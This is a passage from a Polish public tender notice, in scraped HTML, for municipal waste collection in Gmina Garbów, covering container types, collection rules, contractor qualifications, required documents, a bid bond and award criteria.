3,31160103	zużyte opony	1,72170107	zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia innych niż wymienione w 170901, 170902 i 170903	11,28170904	zmieszane odpady z budowy, remontów i demontażu inne niż wymienione w 170901, 170902 i 170903	0,48Tabela nr 3 Szacunkowa ilość gospodarstw domowych wg ilości osób na podstawie złożonych deklaracji Zamawiający zastrzega możliwość zmiany ilości gospodarstw w przedziale od -5% do +5%.W przypadku zwiększenia ilości gospodarstw, pojemnik na odpady zmieszane Wykonawca dostarczy na PSZOK, skąd będzie wydawany właścicielowi nieruchomości.Na terenie Gminy Garbów będzie obowiązywał system mieszany: pojemnikowo-workowy zbiórki odpadów komunalnych.Niesegregowane (zmieszane) odpady komunalne - zmieszane odpady komunalne oraz odpady powstałe po segregacji będą gromadzone w pojemnikach, które Wykonawca ustawi w miejscach wskazanych przez Właścicieli nieruchomości i Zarządców. Wykonawca zapewni i dostarczy odpowiednie pojemniki na czas trwania umowy. W zabudowie wielorodzinnej do gromadzenia zmieszanych odpadów będą służyły pojemniki:1100 l w kolorze pomarańczowym.W zabudowie jednorodzinnej pojemniki o pojemności:120 l lub 240 l W wyjątkowych uzasadnionych przypadkach np. dla miejsc trudnodostępnych, do zbierania odpadów zmieszanych służyć mogą worki foliowe 120 l dostarczone przez WykonawcęSelektywnie zbierane odpady komunalne oraz odpady BIO - selektywna zbiórka odpadów komunalnych będzie odbywała się: w zabudowie jednorodzinnej - w systemie workowym z częstotliwością odbioru raz na miesiąc. Wprowadza się cztery rodzaje worków: a)	Żółty z napisem ,,Metale i tworzywa sztuczne" - odpady metali, tworzywa sztuczne w tym odpady opakowaniowe tworzyw sztucznych opakowania wielomateriałowe.b)	Niebieski z napisem ,, Papier" - suchy i nie zanieczyszczony papier, tektura, opakowania z tektury ;c)	Zielony z napisem ,,Szkło"- szkło opakowaniowe ( bezbarwne i kolorowe)d)	Brązowy z napisem ,,Bio"- odpady ulegające biodegradacji e)	przezroczysty lub czarny - na odpady zmieszane w uzasadnionych przypadkach i dla posesji trudnodostępnych; w zabudowie wielorodzinnej - w systemie pojemnikowym, odbiór raz na tydzień: a)	pojemnik 1500 l typu ,,dzwon" 1500 l w kolorze niebieskim z napisem ,, Papier b)	pojemnik 1500 l typu ,,dzwon" 1500 l w kolorze żółtym z napisem ,,Metale i tworzywa sztuczne" ; c)	pojemnik 1500 l typu ,,dzwon" w kolorze zielonym - na szkło z napisem ,,Szkło";d)	pojemnik min. 1100 l typu ,,kanarek" oznaczonym kolorami i napisem j.w.e)	pojemnik w kolorze brązowym z napisem ,,BIO" PSZOK: - odbiór wg potrzeb a)	Kontener kp- 5 odpady z drobnych remontówb)	Kontener kp- 7 gabarytyc)	Kontener kp - 7 zamknięty - elektroodpadyd)	inne w zależności od potrzeb ( 120 l, 240 l, 700 l, 1100 l, 1500 l, KP-7);e)	pojemniki specjalne ( na leki, opakowania zanieczyszczone substancjami niebezpiecznymi) do wyposażenia PSZOK według potrzeb.Odbiór odpadów wielkogabarytowych i elektroodpadów będzie odbywał się poprzez ich dostarczenie do PSZOK-u oraz 2 razy w okresie obowiązywania umowy poprzez odbieranie wystawionych w/w odpadów z miejsc wyznaczonych przez Zamawiającego, zgodnie z dostarczonym przez Wykonawcę harmonogramem.Odbiór odpadów z pojemników na odpady zmieszane oraz zebrane selektywnie oraz z worków następuje z posesji. Oznacza to że w dniu wywozu właściciele obowiązani są wystawić odpady przed swoje posesje przy drodze publicznej do godz. 7.00.Wykaz urządzeń do gromadzenia odpadów: o	Pojemniki jednokolorowe wykonane zgodnie z obowiązującymi normami oraz wymaganiami zawartymi w Regulaminie utrzymania czystości i porządku w Gminie Garbów o	Worki z folii polietylenowej LDPE o grubości min. 0,06 mm, wykonane zgodnie z obowiązującymi normami nie ulegające pękaniu lub rozerwaniu, w kolorach :a)	Żółty z napisem ,,Metale i tworzywa sztuczne" - odpady metali, tworzywa sztuczne w tym odpady opakowaniowe tworzyw sztucznych opakowania wielomateriałowe.b)	Niebieski z napisem ,, Papier" - suchy i nie zanieczyszczony papier, tektura, opakowania z tektury ;c)	Zielony z napisem ,,Szkło"- szkło opakowaniowe ( bezbarwne i kolorowe)d)	Brązowy z napisem ,,Bio"- odpady ulegające biodegradacji e)	przezroczysty lub czarny - na odpady zmieszane w uzasadnionych przypadkach i dla posesji trudnodostępnychTabela nr 4 Prognozowana ilość i pojemność pojemników do dostarczenia przez Wykonawcę (bez uwzględnienia pojemników do wyposażenia PSZOK)Pojemność pojemnika Ilość/ szacunkowo Kolor120 l	751	jednokolorowe*240 l	1395	jednokolorowe* w tym dwa zielone na szkło1100 l 30	pomarańczowe1100 l lub inne zaproponowane przez Wykonawce do odbioru BIO	5	Brazowe lub inne z napisem BIOKP-7, - 6,5 - 7 m3 2	KP-5, 1	Pojemnik typu ,,kanarek" min 1100 l na tekturę opakowaniową	4	z otworem umożliwiającym wrzucanie dużych opakowań lub butelekDzwon 1,5 m3	14	Żółty z napisemDzwon 1,5 m3	8	Zielony z napisemDzwon 1,5 m3	10	Niebieski z napisemWorki 120 l	nielimitowana żółty, niebieski, zielony, (z napisem)przezroczysty* kolor wg uznania Wykonawcy ** napisy zgodnie z Rozporządzeniem w sprawie szczegółowego sposobu selektywnego zbierania wybranych frakcji odpadów Zamawiający zastrzega sobie zmianę ilości i rodzaju pojemników w celu regulacji poprawności odbioru odpadów. Pojemniki winny być w dobrym stanie technicznym i wizualnym, zaopatrzone w otwory wrzutowe wielkością i kształtem dostosowane do rodzaju zbieranego odpadu, II.5 Sposób rozliczenia usługiROZLICZENIE USŁUGI NASTĘPOWAŁA BĘDZIE W FORMIE MIESIĘCZNEGO RYCZAŁTU</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">90511000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90510000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90514000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34928480-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>79820000-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-09-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">posiadają wpis do rejestru działalności regulowanej o której mowa w art. 9b ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach prowadzonego przez właściwy organ, w zakresie objętym przedmiotem zamówienia; 1.2	posiadają indywidualny dla danego przedsiębiorcy numer rejestrowy w Rejestrze podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami o których mowa w Ustawie o odpadach z 14 grudnia 2012 r (Dz.U.2019.701 t.j. z dnia 2019.04.16)1.3 nie podlegają wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp,</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia wymagań w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca winien wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, jedno zamówienie polegające na odbiorze, transporcie i przekazywaniu do odzysku lub unieszkodliwiania odpadów komunalnych na rzecz właścicieli nieruchomości w sposób ciągły, przez okres 12 miesięcy o łącznej masie 1500 Mg. 2) Dysponowanie potencjałem technicznym Warunek dysponowania odpowiednim potencjałem technicznym uznaje się za spełniony, jeżeli Wykonawca dysponuje sprzętem niezbędnym do wykonywania przedmiotu umowy zgodnie z obowiązującymi przepisami prawa oraz wymaganiami Zamawiającego w ilości , co najmniej: o	2 (dwa) pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, posiadających konstrukcję zabezpieczającą przed rozwiewaniem i rozpylaniem przewożonych odpadów wyposażone w system monitoringu bazujący na systemie pozycjonowania satelitarnego umożliwiającego trwałe zapisywanie oraz weryfikację danych o położeniu pojazdówo	2 (dwa) pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych posiadających konstrukcję zabezpieczającą przed rozwiewaniem i rozpylaniem przewożonych odpadów wyposażone w system monitoringu bazujący na systemie pozycjonowania satelitarnego umożliwiającego trwałe zapisywanie oraz weryfikację danych o położeniu pojazdów o	1 (jeden) pojazd przystosowany do odbierania zebranych odpadów BIO posiadających konstrukcję zabezpieczającą przed rozwiewaniem i rozpylaniem przewożonych odpadów wyposażone w system monitoringu bazujący na systemie pozycjonowania satelitarnego umożliwiającego trwałe zapisywanie oraz weryfikację danych o położeniu pojazdów o	1 (jeden) pojazd przystosowany do odbioru odpadów zgromadzonych w kontenerach (tzw. hakowiec lub bramowiec)o	1(jeden ) samochód o ładowności do 2,5 t do obsługi miejsc o trudnym dojeździe wyposażony w system monitoringu bazujący na systemie pozycjonowania satelitarnego umożliwiającego trwałe zapisywanie oraz weryfikację danych o położeniu pojazdówWyżej wymienione pojazdy muszą być wyposażone w system GPS oraz zamontowaną kamerę ( z funkcją zapisu), która umożliwi monitorowanie i kontrolę segregacji odpadów na terenie poszczególnych nieruchomości.Zamawiający uzna warunek dysponowania odpowiednim potencjałem technicznym jeżeli wykonawca złoży wykaz sprzętu i urządzeń ( załącznik nr 9 do SIWZ ) ze wskazaniem podstawy prawnej dysponowania. Samochody przeznaczone do realizacji zamówienia powinny posiadać co najmniej certyfikat Euro 4.W przypadku reklamacji związanych z wykonaniem usługi odbioru odpadów, Wykonawca ma obowiązek na żądanie Zamawiającego przekazać zapis z kamery dokumentujący odbiór odpadów z nieruchomości, której dotyczy reklamacja. Pojazdy wykorzystywane do wykonania zamówienia winne być w stanie technicznym, który umożliwi odbieranie odpadów komunalnych objętych umową zgodnie z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości. Pojazdy powinny posiadać widoczne logo i numer telefonu Wykonawcy oraz być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">. Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23. Wraz ze złożonym oświadczeniem, wykonawca może przedstawić dowody, że powiązania z innymi wykonawcami nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. (Wzór oświadczenia stanowi zał. Nr 4 do SIWZ).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">. Wykaz świadczonych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, wartości, dat wykonania oraz odbiorców i miejsca oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane prawidłowo; wg wzoru Zakres referencji i innych dokumentów musi potwierdzać spełnianie odpowiednio warunku określonego w dziale IV ust. 1 pkt 1.3 i 1.4 SIWZ. (Wzór wykazu stanowi załącznik nr 6 do SIWZ.)o	W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców.o	1.2.Wykaz osób skierowanych do realizacji zamówienia .(Zał. Nr 7 do SIWZ).1.3 Dysponowanie odpowiednim potencjałem technicznym -Wykaz sprzętu - załącznik nr 9 do SIWZ2. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem.3. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawcy, wykonawcy wspólnie ubiegający się o udzielenie zamówienia albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą.4. Wszystkie	wymagane dokumenty powinny być sporządzone w języku polskim, na maszynie, komputerze lub odręcznie w sposób zapewniający czytelność tekstu.5. W zakresie nie uregulowanym niniejszą SIWZ mają zastosowanie przepisy Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielnie zamówienia ( Dz. U. z 2016 r. poz. 1126).6. Jeżeli Wykonawca nie złoży oświadczeń, o których mowa w rozdziale V, oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, lub innych dokumentów niezbędnych do przeprowadzenia postępowania, oświadczenia lub dokumenty będą niekompletne, będą zawierać błędy lub budzić wskazane przez Zamawiającego wątpliwości, Zamawiający wezwie do ich złożenia, uzupełnienia, poprawienia lub udzielenia wyjaśnień, w terminie przez siebie wskazanym, chyba że mimo ich złożenia oferta Wykonawcy podlegałaby odrzuceniu albo konieczne byłoby unieważnienie postępowania.7. Do przeliczenia na PLN wartości wskazanej w dokumentach złożonych na potwierdzenie spełniania warunków udziału w postępowaniu, wyrażonej w walutach innych niż PLN, Zamawiający przyjmie średni kurs publikowany przez Narodowy Bank Polski z dnia wszczęcia postępowania, tj. zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych. od wykonawcy w postępowaniu o udzielnie zamówienia.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawcy wspólnie ubiegający się o zamówienie:1) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania;2) zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia;3) pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów;4) pełnomocnictwo składa się w oryginale lub kopii poświadczonej notarialnie.5) jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie (konsorcjum) zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy żądać przedstawienia w określonym terminie umowy regulującej współpracę tych Wykonawców.Uwaga: Uczestnikami w postępowaniu o udzielenie zamówienia publicznego, Wykonawcami w rozumieniu art. 2 pkt. 11 Pzp, są wspólnicy spółki cywilnej, których udział w postępowaniu traktowany jest jako wspólne ubieganie się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 Pzp.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"> Oferta musi być zabezpieczona wadium o wartości 10.000,00 zł (słownie: dziesięć tysięcy złotych).</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: 